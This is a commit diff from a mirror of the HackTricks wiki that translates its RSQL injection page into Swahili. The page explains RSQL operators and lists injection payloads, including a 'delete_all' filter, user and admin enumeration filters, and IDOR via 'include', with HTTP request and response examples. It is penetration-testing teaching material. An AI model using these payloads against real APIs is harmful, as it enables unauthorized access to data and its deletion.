maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-web/rsql-injection.md'] to sw

Browse Source
This commit is contained in:
Translator 2025-04-15 00:02:14 +00:00
parent 41208039ca
commit 2f24316735
1 changed files with 49 additions and 50 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

99
src/pentesting-web/rsql-injection.md
View File

@ -7,7 +7,7 @@
## RSQL Injection
## What is RSQL?
RSQL ni lugha ya kuandika maswali iliyoundwa kwa ajili ya kuchuja pembejeo kwa kutumia vigezo katika RESTful APIs. Imejengwa kwa msingi wa FIQL (Feed Item Query Language), ambayo ilitolewa awali na Mark Nottingham kwa ajili ya kuuliza Atom feeds, RSQL inajitofautisha kwa urahisi wake na uwezo wa kueleza maswali magumu kwa njia fupi na inayokubalika na URI juu ya HTTP. Hii inafanya kuwa chaguo bora kama lugha ya jumla ya maswali kwa kutafuta mwisho wa REST.
RSQL ni lugha ya kuandika maswali iliyoundwa kwa ajili ya kuchuja pembejeo kwa kutumia vigezo katika RESTful APIs. Imejengwa kwa msingi wa FIQL (Feed Item Query Language), ambayo ilitolewa awali na Mark Nottingham kwa ajili ya kuuliza Atom feeds, RSQL inajitofautisha kwa urahisi wake na uwezo wa kueleza maswali magumu kwa njia fupi na inayokubalika na URI juu ya HTTP. Hii inafanya kuwa chaguo bora kama lugha ya maswali ya jumla kwa kutafuta mwisho wa REST.
## Overview
RSQL Injection ni udhaifu katika programu za wavuti zinazotumia RSQL kama lugha ya maswali katika RESTful APIs. Kama [SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection) na [LDAP Injection](https://owasp.org/www-community/attacks/LDAP_Injection), udhaifu huu hutokea wakati vichujio vya RSQL havijasafishwa ipasavyo, ikiruhusu mshambuliaji kuingiza maswali mabaya ili kufikia, kubadilisha au kufuta data bila idhini.
@ -17,42 +17,42 @@ RSQL inakuwezesha kujenga maswali ya juu katika RESTful APIs, kwa mfano:
```bash
/products?filter=price>100;category==electronics
```
Hii inatafsiri kama ombi lililo na muundo linalochuja bidhaa zenye bei zaidi ya 100 na kundi "electronics".
Hii inatafsiri kama ombi lililo na muundo ambalo linachuja bidhaa zenye bei zaidi ya 100 na kundi "electronics".
Ikiwa programu haithibitishi ipasavyo pembejeo za mtumiaji, mshambuliaji anaweza kubadilisha chujio ili kutekeleza maombi yasiyotarajiwa, kama vile:
Ikiwa programu haitathmini ipasavyo pembejeo za mtumiaji, mshambuliaji anaweza kubadilisha chujio ili kutekeleza maombi yasiyotarajiwa, kama:
```bash
/products?filter=id=in=(1,2,3);delete_all==true
```
Or even take advantage to extract sensitive information with Boolean queries or nested subqueries.
Au hata kutumia fursa ya kutoa taarifa nyeti kwa kutumia maswali ya Boolean au subqueries zilizozungushwa.
## Risks
## Hatari
- **Ufunuo wa data nyeti:** Mshambuliaji anaweza kupata taarifa ambazo hazipaswi kupatikana.
- **Mabadiliko au kufutwa kwa data:** Kuingiza vichujio vinavyobadilisha rekodi za hifadhidata.
- **Kuongezeka kwa mamlaka:** Manipulation ya vitambulisho vinavyotoa majukumu kupitia vichujio ili kudanganya programu kwa kufikia kwa mamlaka ya watumiaji wengine.
- **Kuepuka udhibiti wa ufikiaji:** Manipulation ya vichujio ili kufikia data zilizozuiliwa.
- **Ujanja au IDOR:** Mabadiliko ya vitambulisho kati ya watumiaji kupitia vichujio vinavyoruhusu ufikiaji wa taarifa na rasilimali za watumiaji wengine bila kuthibitishwa ipasavyo kama hivyo.
## Supported RSQL operators
| Operator | Description | Example |
## Watoa huduma wa RSQL wanaoungwa mkono
| Opereta | Maelezo | Mfano |
|:----: |:----: |:------------------:|
| `;` / `and` | Logical **AND** operator. Filters rows where *both* conditions are *true* | `/api/v2/myTable?q=columnA==valueA;columnB==valueB` |
| `,` / `or` | Logical **OR** operator. Filters rows where *at least one* condition is *true*| `/api/v2/myTable?q=columnA==valueA,columnB==valueB` |
| `==` | Performs an **equals** query. Returns all rows from *myTable* where values in *columnA* exactly equal *queryValue* | `/api/v2/myTable?q=columnA==queryValue` |
| `=q=` | Performs a **search** query. Returns all rows from *myTable* where values in *columnA* contain *queryValue* | `/api/v2/myTable?q=columnA=q=queryValue` |
| `=like=` | Performs a **like** query. Returns all rows from *myTable* where values in *columnA* are like *queryValue* | `/api/v2/myTable?q=columnA=like=queryValue` |
| `=in=` | Performs an **in** query. Returns all rows from *myTable* where *columnA* contains *valueA* OR *valueB* | `/api/v2/myTable?q=columnA=in=(valueA, valueB)` |
| `=out=` | Performs an **exclude** query. Returns all rows of *myTable* where the values in *columnA* are neither *valueA* nor *valueB* | `/api/v2/myTable?q=columnA=out=(valueA,valueB)` |
| `!=` | Performs a *not equals* query. Returns all rows from *myTable* where values in *columnA* do not equal *queryValue* | `/api/v2/myTable?q=columnA!=queryValue` |
| `=notlike=` | Performs a **not like** query. Returns all rows from *myTable* where values in *columnA* are not like *queryValue* | `/api/v2/myTable?q=columnA=notlike=queryValue` |
| `<` & `=lt=` | Performs a **lesser than** query. Returns all rows from *myTable* where values in *columnA* are lesser than *queryValue* | `/api/v2/myTable?q=columnA<queryValue` <br> `/api/v2/myTable?q=columnA=lt=queryValue` |
| `=le=` & `<=` | Performs a **lesser than** or **equal to** query. Returns all rows from *myTable* where values in *columnA* are lesser than or equal to *queryValue* | `/api/v2/myTable?q=columnA<=queryValue` <br> `/api/v2/myTable?q=columnA=le=queryValue` |
| `>` & `=gt=` | Performs a **greater than** query. Returns all rows from *myTable* where values in *columnA* are greater than *queryValue* | `/api/v2/myTable?q=columnA>queryValue` <br> `/api/v2/myTable?q=columnA=gt=queryValue` |
| `>=` & `=ge=` | Performs a **equal** to or **greater than** query. Returns all rows from *myTable* where values in *columnA* are equal to or greater than *queryValue* | `/api/v2/myTable?q=columnA>=queryValue` <br> `/api/v2/myTable?q=columnA=ge=queryValue` |
| `=rng=` | Performs a **from to** query. Returns all rows from *myTable* where values in *columnA* are equal or greater than the *fromValue*, and lesser than or equal to the *toValue* | `/api/v2/myTable?q=columnA=rng=(fromValue,toValue)` |
| `;` / `and` | Opereta wa **AND** wa kimantiki. Huchuja safu ambapo *masharti yote* ni *ya kweli* | `/api/v2/myTable?q=columnA==valueA;columnB==valueB` |
| `,` / `or` | Opereta wa **OR** wa kimantiki. Huchuja safu ambapo *angalau moja* ya masharti ni *ya kweli*| `/api/v2/myTable?q=columnA==valueA,columnB==valueB` |
| `==` | Hufanya uchunguzi wa **sawa**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni sawa kabisa na *queryValue* | `/api/v2/myTable?q=columnA==queryValue` |
| `=q=` | Hufanya uchunguzi wa **kutafuta**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* zina *queryValue* | `/api/v2/myTable?q=columnA=q=queryValue` |
| `=like=` | Hufanya uchunguzi wa **kama**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni kama *queryValue* | `/api/v2/myTable?q=columnA=like=queryValue` |
| `=in=` | Hufanya uchunguzi wa **ndani**. Inarudisha safu zote kutoka *myTable* ambapo *columnA* ina *valueA* AU *valueB* | `/api/v2/myTable?q=columnA=in=(valueA, valueB)` |
| `=out=` | Hufanya uchunguzi wa **ondoa**. Inarudisha safu zote za *myTable* ambapo thamani katika *columnA* si *valueA* wala *valueB* | `/api/v2/myTable?q=columnA=out=(valueA,valueB)` |
| `!=` | Hufanya uchunguzi wa *sio sawa*. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* si sawa na *queryValue* | `/api/v2/myTable?q=columnA!=queryValue` |
| `=notlike=` | Hufanya uchunguzi wa **sio kama**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* si kama *queryValue* | `/api/v2/myTable?q=columnA=notlike=queryValue` |
| `<` & `=lt=` | Hufanya uchunguzi wa **chini ya**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni chini ya *queryValue* | `/api/v2/myTable?q=columnA<queryValue` <br> `/api/v2/myTable?q=columnA=lt=queryValue` |
| `=le=` & `<=` | Hufanya uchunguzi wa **chini ya** au **sawa na**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni chini ya au sawa na *queryValue* | `/api/v2/myTable?q=columnA<=queryValue` <br> `/api/v2/myTable?q=columnA=le=queryValue` |
| `>` & `=gt=` | Hufanya uchunguzi wa **zaidi ya**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni zaidi ya *queryValue* | `/api/v2/myTable?q=columnA>queryValue` <br> `/api/v2/myTable?q=columnA=gt=queryValue` |
| `>=` & `=ge=` | Hufanya uchunguzi wa **sawa na** au **zaidi ya**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni sawa na au zaidi ya *queryValue* | `/api/v2/myTable?q=columnA>=queryValue` <br> `/api/v2/myTable?q=columnA=ge=queryValue` |
| `=rng=` | Hufanya uchunguzi wa **kuanzia hadi**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni sawa au zaidi ya *fromValue*, na chini ya au sawa na *toValue* | `/api/v2/myTable?q=columnA=rng=(fromValue,toValue)` |
**Note**: Table based on information from [**MOLGENIS**](https://molgenis.gitbooks.io/molgenis/content/) and [**rsql-parser**](https://github.com/jirutka/rsql-parser) applications.
**Kumbuka**: Jedwali lina msingi wa taarifa kutoka [**MOLGENIS**](https://molgenis.gitbooks.io/molgenis/content/) na [**rsql-parser**](https://github.com/jirutka/rsql-parser) programu.
#### Examples
#### Mifano
- name=="Kill Bill";year=gt=2003
- name=="Kill Bill" and year>2003
- genres=in=(sci-fi,action);(director=='Christopher Nolan',actor==*Bale);year=ge=2000
@ -62,35 +62,34 @@ Or even take advantage to extract sensitive information with Boolean queries or
- genres=in=(sci-fi,action);genres=out=(romance,animated,horror),director==Que*Tarantino
- genres=in=(sci-fi,action) and genres=out=(romance,animated,horror) or director==Que*Tarantino
**Note**: Table based on information from [**rsql-parser**](https://github.com/jirutka/rsql-parser) application.
**Kumbuka**: Jedwali lina msingi wa taarifa kutoka [**rsql-parser**](https://github.com/jirutka/rsql-parser) programu.
## Common filters
These filters help refine queries in APIs:
## Vichujio vya kawaida
Vichujio hivi husaidia kuboresha maswali katika APIs:
| Filter | Description | Example |
| Kichujio | Maelezo | Mfano |
|--------|------------|---------|
| `filter[users]` | Filters results by specific users | `/api/v2/myTable?filter[users]=123` |
| `filter[status]` | Filters by status (active/inactive, completed, etc.) | `/api/v2/orders?filter[status]=active` |
| `filter[date]` | Filters results within a date range | `/api/v2/logs?filter[date]=gte:2024-01-01` |
| `filter[category]` | Filters by category or resource type | `/api/v2/products?filter[category]=electronics` |
| `filter[id]` | Filters by a unique identifier | `/api/v2/posts?filter[id]=42` |
| `filter[users]` | Huchuja matokeo kwa watumiaji maalum | `/api/v2/myTable?filter[users]=123` |
| `filter[status]` | Huchuja kwa hali (hai/siyo hai, kukamilika, nk.) | `/api/v2/orders?filter[status]=active` |
| `filter[date]` | Huchuja matokeo ndani ya kipindi cha tarehe | `/api/v2/logs?filter[date]=gte:2024-01-01` |
| `filter[category]` | Huchuja kwa aina au aina ya rasilimali | `/api/v2/products?filter[category]=electronics` |
| `filter[id]` | Huchuja kwa kitambulisho cha kipekee | `/api/v2/posts?filter[id]=42` |
## Parameta za kawaida
Parameta hizi husaidia kuboresha majibu ya API:
## Common parameters
These parameters help optimize API responses:
| Parameter | Description | Example |
| Parameta | Maelezo | Mfano |
|-----------|------------|---------|
| `include` | Includes related resources in the response | `/api/v2/orders?include=customer,items` |
| `sort` | Sorts results in ascending or descending order | `/api/v2/users?sort=-created_at` |
| `page[size]` | Controls the number of results per page | `/api/v2/products?page[size]=10` |
| `page[number]` | Specifies the page number | `/api/v2/products?page[number]=2` |
| `fields[resource]` | Defines which fields to return in the response | `/api/v2/users?fields[users]=id,name,email` |
| `search` | Performs a more flexible search | `/api/v2/posts?search=technology` |
| `include` | Inajumuisha rasilimali zinazohusiana katika jibu | `/api/v2/orders?include=customer,items` |
| `sort` | Hupanga matokeo kwa mpangilio wa kuongezeka au kupungua | `/api/v2/users?sort=-created_at` |
| `page[size]` | Inadhibiti idadi ya matokeo kwa kila ukurasa | `/api/v2/products?page[size]=10` |
| `page[number]` | Inabainisha nambari ya ukurasa | `/api/v2/products?page[number]=2` |
| `fields[resource]` | Inafafanua ni maeneo gani ya kurudishwa katika jibu | `/api/v2/users?fields[users]=id,name,email` |
| `search` | Hufanya utafutaji wa kubadilika zaidi | `/api/v2/posts?search=technology` |
## Information leakage and enumeration of users
The following request shows a registration endpoint that requires the email parameter to check if there is any user registered with that email and return a true or false depending on whether or not it exists in the database:
### Request
## Ufunuo wa taarifa na uhesabuji wa watumiaji
Ombi lifuatalo linaonyesha mwisho wa usajili ambao unahitaji parameta ya barua pepe ili kuangalia kama kuna mtumiaji yeyote aliyejiandikisha kwa barua pepe hiyo na kurudisha kweli au uongo kulingana na kama ipo katika hifadhidata:
### Ombi
```
GET /api/registrations HTTP/1.1
Host: localhost:3000
@ -239,7 +238,7 @@ Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
```
Tena tunatumia filters na opereta maalum ambazo zitaturuhusu njia mbadala ya kupata taarifa za watumiaji na kuepuka udhibiti wa ufikiaji. Kwa mfano, chujio kwa wale *watumiaji* ambao wana herufi “*a*” katika *ID* yao ya mtumiaji:
Tena tunatumia filters na opereta maalum ambazo zitaturuhusu njia mbadala ya kupata taarifa za watumiaji na kuepuka udhibiti wa ufikiaji. Kwa mfano, chujio kwa *watumiaji* ambao wana herufi “*a*” katika *ID* yao ya mtumiaji:
### Request
```
GET /api/users?filter[users]=id=in=(*a*) HTTP/1.1
@ -313,9 +312,9 @@ Access-Control-Allow-Origin: *
}, {
................
```
## Kuinua Haki
## Privilege Escalation
Ni uwezekano mkubwa kupata mwisho fulani ambao huangalia haki za mtumiaji kupitia jukumu lao. Kwa mfano, tunashughulika na mtumiaji ambaye hana haki:
### Ombi
### Request
```
GET /api/companyUsers?include=role HTTP/1.1
Host: localhost:3000
@ -348,7 +347,7 @@ Access-Control-Allow-Origin: *
"data": []
}
```
Kwa kutumia opereta fulani tunaweza kuhesabu watumiaji wa usimamizi:
Kwa kutumia opereta fulani tunaweza kuhesabu watumiaji wa msimamizi:
### Request
```
GET /api/companyUsers?include=role&filter[companyUsers]=user.id=='94****************************' HTTP/1.1
@ -460,7 +459,7 @@ Access-Control-Allow-Origin: *
.......
```
## Impersonate or Insecure Direct Object References (IDOR)
Mbali na matumizi ya parameter ya `filter`, inawezekana kutumia parameters nyingine kama `include` ambayo inaruhusu kujumuisha katika matokeo parameters fulani (kwa mfano lugha, nchi, nywila...).
Mbali na matumizi ya parameter ya `filter`, inawezekana kutumia parameters nyingine kama `include` ambayo inaruhusu kujumuisha katika matokeo parameters fulani (mfano: lugha, nchi, nywila...).
Katika mfano ufuatao, taarifa za wasifu wetu wa mtumiaji zinaonyeshwa:
### Request